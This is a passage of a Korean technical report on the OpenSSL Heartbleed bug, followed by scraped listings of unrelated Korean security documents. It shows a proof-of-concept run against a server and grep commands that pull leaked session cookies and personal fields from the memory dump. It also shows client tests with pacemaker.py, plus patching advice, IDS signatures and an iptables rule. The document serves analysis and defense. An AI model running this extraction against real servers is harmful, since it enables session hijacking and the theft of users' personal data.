19 - 다음은반복실행결과를저장한 dump 파일에서 grep 를이용해쿠키값을추출한것임 ghost-2:heartbleed ghost$ grep -a "^Cookie:" dump Cookie: JSESSIONID=F79BE6FCBF7ADB4F1F3E200CA47AAD34.newtwo Cookie: JSESSIONID=18B688BAF5EA77DB03151C39152ADC2A.newtwo Cookie: JSESSIONID=B544DFDD40EAD852833B649CCAC5ED46.newtwo Cookie: JSESSIONID= FEA7E870AC FD1CC.newone; utma= ; utmb= ; utmc= ; utmz= utmgclid=cjhsjc391b0cfssq7aodacea3w utmccn=(not%20set) utmcm d=(not%20set) Cookie: JSESSIONID=9269A7D9C844A755A28BCEFB39D128A4.newone Cookie: JSESSIONID= FEA7E870AC FD1CC.newone; utma= ; utmb= ; utmc= ; utmz= utmgclid=cjhsjc391b0cfssq7aodacea3w utmccn=(not%20set) utmcm d=(not%20set) Cookie: JSESSIONID=2B324E61D8D24357F638B9E6CA4A5F41.newtwo Cookie: JSESSIONID=3637E48CEF3855BDDBBDED63E609E0DB.newone Cookie: JSESSIONID=B544DFDD40EAD852833B649CCAC5ED46.newtwo Cookie: JSESSIONID=3637E48CEF3855BDDBBDED63E609E0DB.newone Cookie: JSESSIONID=B544DFDD40EAD852833B649CCAC5ED46.newtwo Cookie: JSESSIONID=3637E48CEF3855BDDBBDED63E609E0DB.newone Cookie: JSESSIONID=B544DFDD40EAD852833B649CCAC5ED46.newtwo Cookie: JSESSIONID=2B324E61D8D24357F638B9E6CA4A5F41.newtwo Cookie: JSESSIONID=2B324E61D8D24357F638B9E6CA4A5F41.newtwo Cookie: JSESSIONID=3637E48CEF3855BDDBBDED63E609E0DB.newone Cookie: JSESSIONID=A9FEC6C9074EA05CF357BA0963D133A2.newtwo ghost-2:heartbleed ghost$ - 다음은반복실행결과를저장한 dump 파일에서 pcregrep 를이용해의미있는정보들을 추출한것임 (pcregrep 8 을 Mac OS X 에설치할경우 root 권한으로설치해야에러가 발생하지않음 ) ghost-2:heartbleed ghost$ pcregrep -ao "[A-Za-z0-9_-]+=[0-9a-zA-Z]+" dump v=3 p=33 p=33 q=0 q=0 q=0 JSESSIONID=F79BE6FCBF7ADB4F1F3E200CA47AAD34 SESSIONID=F79BE6FCBF7ADB4F1F3E200CA47AAD34 3AcellPhone1=210 3AcellPhone2=861 3AcellPhone3=1530 issuetype=1 other=i JSESSIONID=18B688BAF5EA77DB03151C39152ADC2A bih=460 psw=320 psh=148 frm=0 ui=uv3sl1sr1cc1 rurl=http ref=http r=n utmgclid=cjhsjc391b0cfssq7aodacea3w / 22
20 monthlyincome=xxxx rmsubmitted=false trackpageid=1144 firstname=xxxxxx lastname=xxxxxxx mobile=xxxxxxxxx promoid=8 subpromoid=default utma= ref=http q=0 q=0 JSESSIONID=9269A7D9C844A755A28BCEFB39D128A4 promoid=ppc gclid=cjhsjc391b0cfssq7aodacea3w JSESSIONID= FEA7E870AC FD1CC utma= utmb= utmc= utmz= utmgclid=cjhsjc391b0cfssq7aodacea3w d=cjhsjc391b0cfssq7aodacea3w utma= utmb= utmc= utmz= utmgclid=cjhsjc391b0cfssq7aodacea3w firstname=xxx lastname=xxxxx =xxxxxxxx mobilephone=xxxxxxx x=119 y=23 agreeterms=on agreetext=on ref=http q=0 JSESSIONID=2B324E61D8D24357F638B9E6CA4A5F41 affiliate_ref=ppcmmiez9qekyqb2exhsj3up99l0vehd4ah5240ibuitfwy96qy9 promoid=ppc gclid=cn JSESSIONID=3637E48CEF3855BDDBBDED63E609E0DB d=cjhsjc391b0cfssq7aodacea3w q=0 JSESSIONID=A9FEC6C9074EA05CF357BA0963D133A2 ghost-2:heartbleed ghost$ - 위의추출한결과를보면이름, 이메일, 전화번호, 월수익등의정보와세션 ID 등의정보가 노출되었음을알수있음 - 이코드는 plain text 통신프로토콜의확장기능인 STARTTLS 를사용하는메일서버도 점검하는기능이있으며, 사용법은다음과같음 ghost-2:heartbleed ghost$ python heartbleed-poc.py -s -p 25 xxx.xxx.xxx.xxx Scanning xxx.xxx.xxx.xxx on port 25 #6. Peter Wu 의 CVE client 테스트코드, pacemaker.py - 이코드는 curl, wget 등각종클라이언트를실행했을때데이터노출여부를확인하는 코드로, 에서확인할수있음 17 / 22
21 - 먼저 pacemaker.py 를실행하면 listening 모드에서값이입력되길기다리고있으며, ghost-2:heartbleed ghost$ python pacemaker.py Listening on :4433 for tls clients - 다른콘솔에서다음과같이 curl 을실행하면, ghost-2:heartbleed ghost$ curl curl: (35) Unknown SSL protocol error in connection to localhost:4433 ghost-2:heartbleed ghost$ - 대기중이던서버에서다음과같이출력이되고, 만약취약하지않을경우다음과같은 문자열이출력되며, Connection from: :52534 Possibly not vulnerable - 만약, 취약할경우아래와같은형태로출력됨 ghost-2:heartbleed ghost$ python pacemaker.py Listening on :4433 for tls clients Connection from: :52531 Client returned (0xffff) bytes 0000: ff ff 2d c6 6d 86...@ R4.m. 0010: 8d e da ee 7e 21 c4 1d 2e 9f e9 60 5f 05..@...~!...`_. 0020: b0 ce af 7e b7 95 8c f d5 00 c ~...3B? : f : * 4000: @ : @.. c000: c010: @... fff0: 다음은 wget 을사용했을때출력되는결과임 ghost-2:heartbleed ghost$ python pacemaker.py Listening on :4433 for tls clients ghost-2:heartbleed ghost$ wget -O /dev/null :35: Resolving google.com (google.com) , , ,... Connecting to google.com (google.com) : connected. ERROR: cannot verify google.com's certificate, issued by `/C=US/O=Google Inc/CN=Google Internet Authority G2': Unable to locally verify the issuer's authority. ERROR: certificate common name `*.google.com' doesn't match requested host name `google.com'. To connect to google.com insecurely, use ` --no-check-certificate' :35: Resolving localhost (localhost)... ::1, , fe80::1 Connecting to localhost (localhost) ::1 : failed: Connection refused. Connecting to localhost (localhost) : connected. Unable to establish SSL connection. ghost-2:heartbleed ghost$ ghost-2:heartbleed ghost$ python pacemaker.py Listening on :4433 for tls clients Connection from: : / 22
22 Client returned (0xffff) bytes 0000: ff ff 2d c6 6d -..R4.m. 0010: 8d e da ee 7e 21 c4 1d 2e 9f e9 60 5f 0020: b0 ce af 7e b7 95 8c f d5 00 c ~...3B? : f b f9 83 b a4...g.h : be 92 ad 86 2c 16 fb c f ff Y2..., : 02 d d5 82 0c 2a 2e 67 6f 6f 67 6c *.google 0270: 2e 63 6f 6d 82 0d 2a 2e 61 6e f e.com..*.android. 0280: 63 6f 6d a 2e e e 65 com..*.appengine 0290: 2e 67 6f 6f 67 6c 65 2e 63 6f 6d a 2e 63.google.com..*.c 02a0: 6c 6f e 67 6f 6f 67 6c 65 2e 63 6f 6d 82 loud.google.com. 02b0: 16 2a 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c *.google -analyt c000: c010: fff0: pacemaker.py 를이용해다른클라이언트에대해서도확인할수있음 #7. Metasploit 모듈 - Metasploit용모듈공개 (Metasploit 측제공이미지 ) 19 / 22
23 3) 방어책 # OpenSSL 버전업데이트 - OpenSSL 1.0.1g에서는해당취약점이패치가되었으므로, OpenSSL 1.0.1g 이상의버전으로업데이트필요 ( 최신버전 이전버전을사용해야만할경우취약한부분의코드를수정해재컴파일하여사용하는 것이필요 # 패스워드변경 - yahoo 등을비롯해일부서버의계정정보와패스워드가노출되었으므로, 패스워드를 수정하는것이필요하며, yahoo 계정의사용자일경우반드시수정해야할것임 # Tor 업데이트 - 우리나라시간으로 4 월 9 일취약한버전의 OpenSSL 을버전 1.0.1g 로업데이트한 Tor 안정버전을발표함 - 다운로드 : # VMware - VMWare는취약한제품들의목록과업데이트관련정보를제공하고있음 &externalid= # Stephen Coty가제시한 IDS signature =Feed%3A+HelpNetSecurity+%28Help+Net+Security%29 참고 alert tcp!$home_net any -> $HOME_NET 443 (msg:"sslv3 OpenSSL Heartbeat Memory Leak"; content:" "; depth:3; byte_test:2,>,199,3; threshold:type limit, track by_src, count 1, seconds 600; reference:cve, ; classtype:bad-unknown; sid: ; tag:session,5,packets; rev:1;) alert tcp!$home_net any -> $HOME_NET 443 (msg:"tlsv1 OpenSSL Heartbeat Memory Leak"; content:" "; depth:3; byte_test:2,>,199,3; threshold:type limit, track by_src, count 1, seconds 600; reference:cve, ; classtype:bad-unknown; sid: ; tag:session,5,packets; rev:1;) alert tcp!$home_net any -> $HOME_NET 443 (msg:"tlsv1.1 OpenSSL Heartbeat Memory Leak"; content:" "; depth:3; byte_test:2,>,199,3; threshold:type limit, track by_src, count 1, seconds 600; reference:cve, ; classtype:bad-unknown; sid: ; tag:session,5,packets; rev:1;) 9 aign=feed%3a+helpnetsecurity+%28help+net+security%29 20 / 22
24 alert tcp!$home_net any -> $HOME_NET 443 (msg:"tlsv1.2 OpenSSL Heartbeat Memory Leak"; content:" "; depth:3; byte_test:2,>,199,3; threshold:type limit, track by_src, count 1, seconds 600; reference:cve, ; classtype:bad-unknown; sid: ; tag:session,5,packets; rev:1;) # Fabien Bourdaire 이만든 https 를위한 iptables 룰 iptables -t filter -A INPUT -p tcp --dport 443 -m u32 --u32 \ "52=0x :0x1803FFFF" -j DROP 3. 기타 - xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ( 공개용버전내용삭제 ) - 브라우저는 OpenSSL 을사용하지않으므로, 이취약점에의해영향을받지않음 - Android 로이공격에취약하다고하며, 해당안드로이드시스템에대해테스트는하지못함 - 카카오톡의경우에도취약점정보가처음공개되었을때이취약점의영향을받았음 - OpenVPN 도이버그에취약하다고하며, 아직 OpenVPN 에대해테스트는하지못함 - IIS 서버는 OpenSSL 을사용하지않기때문에취약하지않음 - 해당취약점을수정한 Bitcoin Core Version 이공개됨 - 이취약점에영향을받지않는주요대상 * 국내금융권대부분 * 국내포털사이트 * Amazon * Apple * Microsoft * Twitter * ebay * PayPal * Evernote 21 / 22
25 - 패스워드변경권고 * Facebook * Instagram * Google * Yahoo * Dropbox * GitHub - 참고자료 * CVE * Heartbleed 웹사이트 * CNET, Heartbleed' bug undoes Web encryption, reveals Yahoo passwords * Matthew Green, Attack of the week: OpenSSL Heartbleed * Rahul Sasi, CVE Heartbleed Attack POC and Mass Scanner * Jake Williams, HeartBleed what you need to know - 첨부파일 ( 공개용버전내용삭제 ) 22 / 22
목차 1) 개요 ) HTTPS & SSL ) HeartBleed 란?
HeartBleed 지용빈 목차 1) 개요 -------------------------------------------------- 2) HTTPS & SSL---------------------------------------- 3) HeartBleed 란?--------------------------------------- 4) HeartBleed 의원리
More informationNetwork seminar.key
Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More information[SHA-2] HASH 함수 중의 하나로, HASH는 임의의 길이의 데이터를 입력 받아 고정된 길이의 데이터(해시 값)로 출력합니다. 동일한 데이터인 경우 동일한 해시 값을 갖는다. 에 기초하여 메시지 무결성(오류/변조 탐지)을 확인하기 위하여 사용됩 니다. 하지만 서
About SHA2, SSLv3 2014-10 한국정보인증 [SHA-2] HASH 함수 중의 하나로, HASH는 임의의 길이의 데이터를 입력 받아 고정된 길이의 데이터(해시 값)로 출력합니다. 동일한 데이터인 경우 동일한 해시 값을 갖는다. 에 기초하여 메시지 무결성(오류/변조 탐지)을 확인하기 위하여 사용됩 니다. 하지만 서로
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More informationUDP Flooding Attack 공격과 방어
황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5
More informationSubnet Address Internet Network G Network Network class B networ
Structure of TCP/IP Internet Internet gateway (router) Internet Address Class A Class B Class C 0 8 31 0 netid hostid 0 16 31 1 0 netid hostid 0 24 31 1 1 0 netid hostid Network Address : (A) 1 ~ 127,
More informationbn2019_2
arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily
More informationSena Device Server Serial/IP TM Version
Sena Device Server Serial/IP TM Version 1.0.0 2005. 3. 7. Release Note Revision Date Name Description V1.0.0 2005-03-7 HJ Jeon Serial/IP 4.3.2 ( ) 210 137-130, : (02) 573-5422 : (02) 573-7710 email: support@sena.com
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More information1217 WebTrafMon II
(1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network
More informationPowerPoint 프레젠테이션
(Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet
More information<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,
More informationTCP.IP.ppt
TCP/IP TCP/IP TCP/IP TCP/IP TCP/IP Internet Protocol _ IP Address Internet Protocol _ Subnet Mask Internet Protocol _ ARP(Address Resolution Protocol) Internet Protocol _ RARP(Reverse Address Resolution
More information목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate
ALTIBASE HDB 6.1.1.5.6 Patch Notes 목차 BUG-39240 offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG-41443 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate 한뒤, hash partition
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More information품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]
품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ] 2014. 10. 목 차 I. Stack 통합테스트개요 1 1. 목적 1 II. 테스트대상소개 2 1. The Bug Genie 소개 2 2. The Bug Genie 주요기능 3 3. The Bug Genie 시스템요구사항및주의사항 5 III. Stack 통합테스트 7 1. 테스트환경
More informationMicrosoft Word doc
TCP/IP 구조 1. I.P 구조설명 2. ARP 구조설명 3. TCP 구조설명 4. UDT 구조설명 5. RIP 구조설명 6. BOOTP 구조설명 7. TFTP 구조설명 destination addr source addr type data CRC 6 6 2 46-1500 4 type 0X0800 IP datagram 2 46-1500 type 0X0806
More informationuntitled
CAN BUS RS232 Line Ethernet CAN H/W FIFO RS232 FIFO IP ARP CAN S/W FIFO TERMINAL Emulator COMMAND Interpreter ICMP TCP UDP PROTOCOL Converter TELNET DHCP C2E SW1 CAN RS232 RJ45 Power
More information리눅스 취약점대응방안권고 / KISA 취약점점검팀 영향받는플랫폼 OS, FAQ 추가 개요 미국보안회사 에의해 시스템의 라이브러리 의특정함수에서임의코드를실행할수있는취약점이공개 해당취약점은 CVE 지정, 도메인네임을
리눅스 취약점대응방안권고 15. 01. 29 / KISA 취약점점검팀 15. 01. 30 영향받는플랫폼 OS, FAQ 추가 개요 미국보안회사 에의해 시스템의 라이브러리 의특정함수에서임의코드를실행할수있는취약점이공개 해당취약점은 CVE-2015-0235 지정, 도메인네임을 IP로변환하는기능이포함된서비스 ( 메일, 웹등 ) 들은해당취약점에영향을받을수있음 취약점상세분석
More informationMySQL-Ch10
10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,
More information취약점 대응방안권고 ( 월 ) / KISA 취약점분석팀 ( 수 ) OpenSSL 취약점 FAQ 추가 개요 통신구간암호화를위해많이사용하는 라이브러리에서서버에저장된중요메모리데이터가노출되는 라고명명된심각한버그가발견되어시스템및소프트웨어에대한신속한취약
취약점 대응방안권고 14.4.14( 월 ) / KISA 취약점분석팀 14.04.23( 수 ) OpenSSL 취약점 FAQ 추가 개요 통신구간암호화를위해많이사용하는 라이브러리에서서버에저장된중요메모리데이터가노출되는 라고명명된심각한버그가발견되어시스템및소프트웨어에대한신속한취약점조치를권고 취약점정보 시스템메모리정보노출취약점 - CVE-2014-0160 (2014.04.07.)
More informationCPX-E-EC_BES_C_ _ k1
CPX-E CPX-E-EC EtherCAT 8071155 2017-07 [8075310] CPX-E-EC CPX-E-EC-KO EtherCAT, TwinCAT (). :, 2 Festo CPX-E-EC-KO 2017-07 CPX-E-EC 1... 4 1.1... 4 1.2... 4 1.3... 4 1.4... 5 1.5... 5 2... 6 2.1... 6
More informationhd1300_k_v1r2_Final_.PDF
Starter's Kit for HelloDevice 1300 Version 11 1 2 1 2 3 31 32 33 34 35 36 4 41 42 43 5 51 52 6 61 62 Appendix A (cross-over) IP 3 Starter's Kit for HelloDevice 1300 1 HelloDevice 1300 Starter's Kit HelloDevice
More information제 9 도는 6제어항목의 세팅목표의 보기가 표시된 레이더 챠트(radar chart). 제 10 도는 제 6 도의 함수블럭(1C)에서 사용되는 각종 개성화 함수의 보기를 표시하는 테이블. 제 11a 도 제 11c 도까지는 각종 조건에 따라 제공되는 개성화함수의 변화의
(19) 대한민국특허청(KR) (12) 특허공보(B1) (51) Int. Cl. 5 B66B 1/18 (45) 공고일자 1993년09월28일 (11) 공고번호 특1993-0009339 (21) 출원번호 특1989-0002580 (65) 공개번호 특1989-0014358 (22) 출원일자 1989년03월02일 (43) 공개일자 1989년10월23일 (30) 우선권주장
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More information[Brochure] KOR_TunA
LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /
More informationPowerPoint 프레젠테이션
Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi
More informationTTA Verified : HomeGateway :, : (NEtwork Testing Team)
TTA Verified : HomeGateway :, : (NEtwork Testing Team) : TTA-V-N-05-006-CC11 TTA Verified :2006 6 27 : 01 : 2005 7 18 : 2/15 00 01 2005 7 18 2006 6 27 6 7 9 Ethernet (VLAN, QoS, FTP ) (, ) : TTA-V-N-05-006-CC11
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More informationuntitled
Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.
More information歯규격(안).PDF
ETRI ETRI ETRI ETRI WTLS PKI Client, WIM IS-95B VMS VLR HLR/AC WPKI Cyber society BTS BSC MSC IWF TCP/IP Email Server Weather Internet WAP Gateway WTLS PKI Client, WIM BSC VMS VLR HLR/AC Wireless Network
More information슬라이드 1
PKI Kerberos SAML & Shibboleth OpenID Cardspace & ID 2 < > (= ) password, OTP, bio, smartcard, pki CardSpace, ID What you have.., 2 factor, strong authentication 4 (SSO) Kerberos, OpenID 5 Shared authentication
More informationMicrosoft PowerPoint - 4.스캐닝-1(11.08) [호환 모드]
정보보호 Scanning (1) 목차 Ⅳ. 스캐닝 (Scanning) 1. 활성화된호스트식별 ping 침투테스트범위에있는 IP 주소만목록화 현재동작중인시스템확인 Ping - ICMP(Internet Control messaging Protocol) 패킷을사용 - echo request, echo reply 패킷 - target 시스템이 off상태이거나, ICMP패킷을차단하는경우
More informationOPCTalk for Hitachi Ethernet 1 2. Path. DCOMwindow NT/2000 network server. Winsock update win95. . . 3 Excel CSV. Update Background Thread Client Command Queue Size Client Dynamic Scan Block Block
More information..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A
..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * Amazon Web Services, Inc.. ID Microsoft Office 365*
More information[ 네트워크 1] 3 주차 1 차시. IPv4 주소클래스 3 주차 1 차시 IPv4 주소클래스 학습목표 1. IP 헤더필드의구성을파악하고요약하여설명할수있다. 2. Subnet ID 및 Subnet Mask 를설명할수있고, 각클래스의사용가능한호스트수와사설 IP 주소및네트
3 주차 1 차시 IPv4 주소클래스 학습목표 1. IP 헤더필드의구성을파악하고요약하여설명할수있다. 2. Subnet ID 및 Subnet Mask 를설명할수있고, 각클래스의사용가능한호스트수와사설 IP 주소및네트워크주소와 브로드캐스트주소를설명할수있다. 학습내용 1 : IP 헤더필드구성 1. Network Layer Fields 2. IP 헤더필드의구성 1)
More informationC 프로그래밍 언어 입문 C 프로그래밍 언어 입문 김명호저 숭실대학교 출판국 머리말..... C, C++, Java, Fortran, Python, Ruby,.. C. C 1972. 40 C.. C. 1999 C99. C99. C. C. C., kmh ssu.ac.kr.. ,. 2013 12 Contents 1장 프로그래밍 시작 1.1 C 10 1.2 12
More informationAPI STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum
API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date
More informationRemote UI Guide
Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................
More informationDropbox Forensics
Cloud Storage Forensics Part I : Dropbox 2013. 09. 28 forensic.n0fate.com Dropbox Forensics Dropbox Forensics Dropbox 웹기반파일공유서비스 총 12 개의클라이언트지원 Desktop : Windows, Mac OS X, Linux Mobile : ios, Android,
More information자바-11장N'1-502
C h a p t e r 11 java.net.,,., (TCP/IP) (UDP/IP).,. 1 ISO OSI 7 1977 (ISO, International Standards Organization) (OSI, Open Systems Interconnection). 6 1983 X.200. OSI 7 [ 11-1] 7. 1 (Physical Layer),
More informationKISA-GD
KISA-GD-2011-0002 2011.9 1) RD(Recursive Desired) 플래그 : 리커시브네임서버로하여금재귀적 (recursive) 질의 ( 항목 1.3. 참고 ) 요청을표시함. RD 플레그값이 0 이면반복적 (iterative) 질의를요청 2) AA 플래그 : Authoritative Answer 의약자로써, 네임서버가해당응답데이터를자신이보유하고있는지유무를표시
More information8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 )
8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 ) - DDL(Data Definition Language) : show, create, drop
More informationAPI 매뉴얼
PCI-DIO12 API Programming (Rev 1.0) Windows, Windows2000, Windows NT and Windows XP are trademarks of Microsoft. We acknowledge that the trademarks or service names of all other organizations mentioned
More information긴급송부 보안경고 코드인젝션 취약점관련금융회사자체점검및패치적용권고 보안서비스본부민상식팀장, 조병열인턴 / 개요 코드인젝션취약점이발견됨 에따라조속한 조치가요구되므로이를전파함 위험도및긴급도 구분 위험도 긴급도 등급 상 상 취약점내용 명령인젝션취약점 일
긴급송부 보안경고 코드인젝션 취약점관련금융회사자체점검및패치적용권고 보안서비스본부민상식팀장, 조병열인턴 / 2014. 9. 30 개요 코드인젝션취약점이발견됨 에따라조속한 조치가요구되므로이를전파함 위험도및긴급도 구분 위험도 긴급도 등급 상 상 취약점내용 명령인젝션취약점 일명 보안업데이트가불완전하여여전히취약점존재 원격지에서 공격등이가능한취약점 구분 공격위협 영향받는소프트웨어
More information초보자를 위한 ASP.NET 2.0
(World Wide Web), HTML., (ebay) (Amazon.com) HTML,., Microsoft ASP.NET. ASP.NET ASP.NET., ASP.NET HTML,,. ASP.NET HTML.. ASP.NET, Microsoft Visual Basic. Visual Basic. 5 Visual Basic, Visual Basic. ASP.NET
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O
Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration
More information1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation
1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP
More information6주차.key
6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running
More information자동화 툴 검토 보고서
